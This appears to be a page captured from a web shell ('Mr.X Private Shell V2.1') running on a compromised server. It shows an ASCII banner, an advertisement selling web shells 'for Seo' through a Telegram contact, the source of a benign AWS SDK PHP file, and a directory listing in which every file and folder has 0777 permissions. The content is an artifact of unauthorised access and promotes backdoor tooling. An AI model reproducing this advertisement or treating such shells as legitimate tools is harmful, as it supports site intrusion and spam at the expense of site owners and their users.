__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Aws\Api;
/**
* Represents a list shape.
*/
class ListShape extends Shape
{
private $member;
public function __construct(array $definition, ShapeMap $shapeMap)
{
$definition['type'] = 'list';
parent::__construct($definition, $shapeMap);
}
/**
* @return Shape
* @throws \RuntimeException if no member is specified
*/
public function getMember()
{
if (!$this->member) {
if (!isset($this->definition['member'])) {
throw new \RuntimeException('No member attribute specified');
}
$this->member = Shape::create(
$this->definition['member'],
$this->shapeMap
);
}
return $this->member;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ErrorParser | Folder | 0777 |
|
|
| Parser | Folder | 0777 |
|
|
| Serializer | Folder | 0777 |
|
|
| AbstractModel.php | File | 1.96 KB | 0777 |
|
| ApiProvider.php | File | 7.47 KB | 0777 |
|
| DateTimeResult.php | File | 4.09 KB | 0777 |
|
| DocModel.php | File | 3.38 KB | 0777 |
|
| ListShape.php | File | 786 B | 0777 |
|
| MapShape.php | File | 1.14 KB | 0777 |
|
| Operation.php | File | 3.38 KB | 0777 |
|
| Service.php | File | 13.53 KB | 0777 |
|
| Shape.php | File | 1.81 KB | 0777 |
|
| ShapeMap.php | File | 1.46 KB | 0777 |
|
| StructureShape.php | File | 1.65 KB | 0777 |
|
| TimestampShape.php | File | 1.45 KB | 0777 |
|
| Validator.php | File | 10.04 KB | 0777 |
|